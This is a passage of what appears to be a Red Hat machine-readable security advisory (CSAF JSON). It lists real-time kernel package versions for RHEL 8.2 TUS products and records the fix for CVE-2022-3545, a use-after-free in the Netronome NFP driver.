"name": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-kvm@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-kvm@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
"name": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_id": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo-common-x86_64@4.18.0-193.128.1.rt13.179.el8_2?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src"
},
"product_reference": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "NFV-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src"
},
"product_reference": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64 as a component of Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"relates_to_product_reference": "RT-8.2.0.Z.TUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-3545",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-01-16T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2161310"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in area_cache_get in drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c in the Netronome Flow Processor (NFP) driver in the Linux kernel. This flaw allows a manipulation that may lead to a use-after-free issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: nfp: use-after-free in area_cache_get()",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-3545"
},
{
"category": "external",
"summary": "RHBZ#2161310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2161310"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-3545",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3545"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-3545",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3545"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a"
}
],
"release_date": "2022-08-11T06:30:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
